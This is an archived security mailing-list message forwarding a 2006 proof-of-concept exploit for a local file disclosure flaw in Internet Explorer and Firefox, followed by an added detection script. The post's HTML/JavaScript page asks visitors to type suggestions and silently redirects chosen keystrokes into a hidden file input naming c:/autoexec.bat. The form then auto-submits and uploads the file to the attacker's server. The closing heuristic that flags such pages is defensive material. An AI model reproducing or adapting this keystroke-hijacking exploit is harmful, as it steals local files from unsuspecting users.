Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)



> -----Original Message-----
> From: sirdarckcat@xxxxxxxxx [mailto:sirdarckcat@xxxxxxxxx] 
> Sent: Sunday, June 11, 2006 1:38 PM
> To: vuln-dev@xxxxxxxxxxxxxxxxx
> Subject: InternetExplorer & Mozilla Firefox Local File 
> Disclosure Vulnerability PoC Exploit (Reported by Symantec)
> 
> This is a sample PoC Exploit for the Internet Explorer and 
> Mozilla Firefox security flaw explained here:
> http://www.techweb.com/showArticle.jhtml?articleID=188702202
> and reported by Symantec.
> 
> The subjects of the links suggested are for forcing the user to input:
> FILE
> AUTOEXEC
> BAT
> 
> so we can receive:
> file://c:/autoexec.bat
> 
> and upload this file to a server.
> 
> This is a low risk vulnerability.
> 
> //--START HTML CODE--//
> <html>
> <body>
> <form method=post action="upload.php" type="multipart/form-data">
> Please sugest 3 webpages for each subject (please include 
> http:// or https://)
> <ul>
> <li>Freeware Files Download</li>
> <li>Automovilism</li>
> <li>Extreme Sports</li>
> <li>Technology</li>
> <li>Batman</li>
> </ul>
> <textarea name=other style="width:100%;height:50%"></textarea><br>
> <input type=file name=thet disabled 
> style="visibility:hidden;height:1;width:1">
> </form>
> <script>
> /**
> *  OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
> *             by sirdarckcat [at] gmail [.] com
> *                   from:     elhacker.net
> **/
> var nidshift = new Array(0 ,0 ,0 ,0 ,1  ,0  ,0  ,0 ,1  ,0  ,0 
> ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0  ,0 ,0 ,0);
> var thefilek = new 
> Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,
> 67,190,66,65,84);
> var thefilew = "file://c:/autoexec.bat";
> var dv = 0;
> var chift = false;
> var teo = document.forms[0].thet;
> var feo = document.forms[0].other;
> 
> function checa(tecla) {
>               var rt=(tecla.which)?tecla.which:event.keyCode;
>               var lw=String.fromCharCode(rt);
>               if (dv>=thefilew.length){
>                       document.forms[0].submit();
>               }
>               if (rt == 16){
>                       chift = true;
>               }
>               if (rt==thefilek[dv]){
>                       if ((nidshift[dv] && chift) || 
> (!nidshift[dv] && !chift)){
>                               teo.disabled=false;
>                               teo.style.visibility="visible";
>                               teo.focus();
>                               feo.value += thefilew[dv];
>                               dv++;
>                       }
>               }else{
>                       feo.focus();
>                       teo.disabled=true;
>                       teo.style.visibility="hidden";
>               }
> }
> function solsh(tecla){
>       var rt=(tecla.which)?tecla.which:event.keyCode;
>       if (rt == 16){
>               chift = false;
>       }
> }
> function mprss(tecla){
>       var rt=(tecla.which)?tecla.which:event.keyCode;
>       if (rt == 16){
>               chift = true;
>       }
> }
> document.onkeydown = checa;
> document.onkeyup   = solsh;
> document.onkeypress= mprss;
> </script>
> </body>
> </html>
> //--END HTML CODE--//
> 
> Att.
> Sirdarckcat
> www.elhacker.net
> 
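
A static heuristic for spotting the pattern in the message above (a concealed file input that script focuses from a key handler), added here as a defender-side example and not part of the original post. The function names, indicator names and both sample pages are constructed for illustration, and regex matching over raw HTML is an assumption that misses obfuscated or dynamically built markup.

```javascript
// Added example (Node.js): flags pages combining a concealed <input type=file>
// with key-event handlers and scripted focus changes. All names are hypothetical.

// Every <input> tag whose type attribute is "file".
function fileInputs(html) {
  const tags = html.match(/<input\b[^>]*>/gi) || [];
  return tags.filter((t) => /\btype\s*=\s*["']?file\b/i.test(t));
}

// A file input the user is not meant to see: disabled, hidden, or shrunk to 0-1px.
function isConcealed(tag) {
  return /\bdisabled\b/i.test(tag) ||
    /visibility\s*:\s*hidden|display\s*:\s*none/i.test(tag) ||
    /\b(width|height)\s*:\s*[01](px)?\s*[;"']/i.test(tag);
}

// Concatenate the bodies of all inline <script> elements.
function scriptBodies(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out.join("\n");
}

function analyze(html) {
  const js = scriptBodies(html);
  const indicators = {
    concealedFileInput: fileInputs(html).some(isConcealed),
    keyHandlers: /\bonkey(down|up|press)\s*=|addEventListener\s*\(\s*["']key(down|up|press)["']/i.test(js),
    scriptedFocus: /\.focus\s*\(\s*\)/.test(js),
    togglesDisabled: /\.disabled\s*=\s*(true|false)/.test(js),
    autoSubmit: /\.submit\s*\(\s*\)/.test(js),
  };
  const score = Object.values(indicators).filter(Boolean).length;
  // Verdict needs the three core signals together; each alone is common and benign.
  const suspicious = indicators.concealedFileInput && indicators.keyHandlers && indicators.scriptedFocus;
  return { indicators, score, suspicious };
}

// Constructed samples: structural markers only, handler logic elided.
const SAMPLE_SUSPICIOUS = `<form><textarea name=other></textarea>
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1"></form>
<script>document.onkeydown = function (e) { f.disabled = false; f.focus(); };</script>`;
const SAMPLE_BENIGN = `<form><input type="file" name="avatar"><input type="submit"></form>
<script>document.getElementById("q").focus();</script>`;

console.log(analyze(SAMPLE_SUSPICIOUS), analyze(SAMPLE_BENIGN));
```

The verdict is a triage signal for proxy or crawler pipelines, so pages it flags still need manual review.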




 



